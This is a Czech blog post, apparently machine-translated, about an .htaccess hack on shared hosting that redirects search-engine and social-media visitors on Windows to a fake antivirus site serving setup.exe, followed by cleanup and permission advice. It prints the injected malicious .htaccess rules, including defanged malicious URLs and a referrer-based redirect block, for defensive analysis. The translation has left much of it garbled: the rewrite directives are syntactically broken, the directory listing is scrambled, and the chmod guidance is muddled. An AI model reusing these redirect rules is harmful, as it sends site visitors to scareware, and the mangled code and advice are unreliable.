Malware / Virus -. Htaccess "přepis" & přesměrování

Nová forma viru kteří vidí, že neví, velmi silně ovlivňuje weby hostované na nespolehlivé servery kde uživatelé účty / vedlejší účty může "vidět" každý jiný. Konkrétně se hosting účty o to ve složce "vhosts"Psaní a právo uživatelská složka se "vhosts" je uveden obecný návod ... prodejce ve většině situací. Jedná se o metodu, která nemá použít typické webové servery WHM / cPanel.

Virus akce htaccess -.. Htaccess Hack

Virus ovlivňuje soubory . Htaccess oběť místo. Řádky, které znějí / Směrnice na přesměrování návštěvníků (Již od Yahoo, MSN, Google, Facebook, yaindex, Twitter, MySpace, atd. stránek a portálů s vysokou návštěvností) na některé webové stránky, které nabízejí "antivirus. "Je falešný antivirus, O kterém jsem psal v úvodu .

To je, jak . Htaccess vliv: (nemá přístup k obsahu řádky níže uvedených odkazů)

ErrorDocument 500 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=0
ErrorDocument 502 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=2
ErrorDocument 403 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=3

RewriteEngine On

RewriteCond% {HTTP_REFERER}. * Yandex. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Odnoklassniki. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Vkontakte. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Rambler. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Tube. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Wikipedia. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Blogger. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Baidu. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Qq.com. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Myspace. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Twitter. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Facebook. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Google. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Live. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * AOL. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Bing. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * MSN. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Amazon. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Ebay. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * LinkedIn. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Flickr. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * LiveJasmin. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Soso. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * DoubleClick. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Pornhub. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Orkut. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * LiveJournal. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Wordpress. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Yahoo. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Ask. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Excite. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Altavista. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * MSN. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Netscape. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * HotBot. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Goto. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Infoseek. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Mamma. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Alltheweb. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Lycos. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Vyhledávání. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * MetaCrawler. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Mail. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Dogpile. * $ [NC]

RewriteCond% {HTTP_USER_AGENT}. * Windows. *
RewriteRule. * [R, L]

RewriteCond% {REQUEST_FILENAME}!-F
RewriteCond% {REQUEST_FILENAME}!-D
RewriteCond% {REQUEST_FILENAME} * jpg $ |!.. * Gif $ |. * Png $
RewriteCond% {HTTP_USER_AGENT}. * Windows. *
RewriteRule. * [R, L]

Ti, kteří používají WordPress najdete tyto řádky v souboru . Htaccess z public_html. Kromě toho, virus vytvoří. Htaccess ve stejné složce wp-content.

*K dispozici jsou také k situacím, ve kterých se objeví místo peoriavascularsurgery.com dns.thesoulfoodcafe.com nebo jiné adresy.

Co dělá tento virus.

Po přesměrování, je návštěvník přivítal s otevřenou náručí zprávou:

Varování!
Váš počítač obsahuje různé příznaky virů a škodlivých programů přítomnosti. Váš antivirový systém Vyžaduje okamžitou kontrolu!
Bezpečnostní systém bude rychlý a zdarma skenování počítače na přítomnost virů a škodlivých programů.

1 malware

Bez ohledu na to, které tlačítko je stisknuto, jsme přesměrováni na stránku "Můj počítač"Vytvořeno napodobit XP designu. Tím se automaticky spustí "skenování" na jehož konci zjistíme, že "infekce".

2 malware

Po klepnutí na tlačítko OK nebo Storno, začne downloadSoubor je setup.exe. Tento setup.exe je falešný anti virus ovlivňující systém. Nainstalujte malware šířit další napadené odkazy, a kromě nich anti-virus software (Všechny false), že oběť je pozván ke koupi.
Ti, kteří již kontaktovali virus může použít tento formulář . Doporučuje se také, aby naskenovat celý HDD. Doporučit Kaspersky Internet Security nebo Kaspersky Anti Virus.

Tento typ viru ovlivňuje Návštěvní OS operační systémy Windows XP, Windows ME, Windows 2000, Windows NT, Windows 98 a Windows 95. K dnešnímu dni nejsou známy žádné případy nákazy z operačních systémů Windows Vista a Windows 7.

Jak můžeme odstranit tento virus. Htaccess na serveru a jak, aby se zabránilo infekci.

1. Analyzovat podezřelé soubory a mazání kódů. Chcete-li zajistit, že soubor není ovlivněna pouze . Htaccess byste měli analyzovat všechny soubory . Php si . Js.

2. Přepsat soubor. Htaccess a nastavte chmod 644 nebo 744 s přístup pro zápis pouze vlastníka uživatele.

3. Když vytvoříte hostování v úvahu pro webové stránky ve složce / Home nebo / Webroot Tím se automaticky vytvoří složku, která má často uživatelské jméno (uživatel pro cPanel, ftpAtd.). Chcete-li zabránit psaní dat a přenosu virů z jednoho uživatele na jiného, ​​se doporučuje, aby každý uživatel složku, kterou chcete nastavit:

chmod 644 nebo 744, 755 - zobrazí se 644.
chown-R nume_user nume_folder.
chgrp-R nume_user nume_folder

ls-all způsoby, jak zkontrolovat, zda byly provedeny správně. By se měly objevit něco takového:

drwx-x-x 12 dinamics dinamics května 4096 6 14: 51 dinamics /
drwx-x-x 10 4096 března 7 07 Duran Duran: Duran 46 /
drwx-x-x 12 Trubky 4096 Jan 29 11: 23 trubky /
drwxr-xr-x 14 4096 února 26 2009 Express Express Express /
drwxr-xr-x 9 EZO EZO 4096 května 19 01: 09 EZO /
drwx-x-x 9 pharma pharma 4096 prosince 19 22: 29 pharma /

Pokud jeden z výše bude userele FTP Infikované souboryTo nemůže odeslat virus jiného uživatele hostitele. Je minimální bezpečnostní opatření k ochraně účtů hostované na webovém serveru.

Společné prvky oblastí postižených tímto virem.

Všechny dotčené plochy přesměrovat návštěvníky na weby název domény obsahující "/".

Tato "virus. htaccess"Ovlivnit jakékoli CMS (Joomla, WordPress, phpBBAtd.) pomocí . Htaccess,

. Htaccess Přesměrování Virus Hack &.

Malware / Virus -. Htaccess "přepis" & přesměrování

O autorovi

Stealth LP

Zakladatel a editor Stealth nastaveníDatum 2006.
Zkušenosti v operačních systémech Linux (zejména CentOS), Mac OS X, Windows XP> Windows 10 a WordPress (CMS).

Zanechat komentář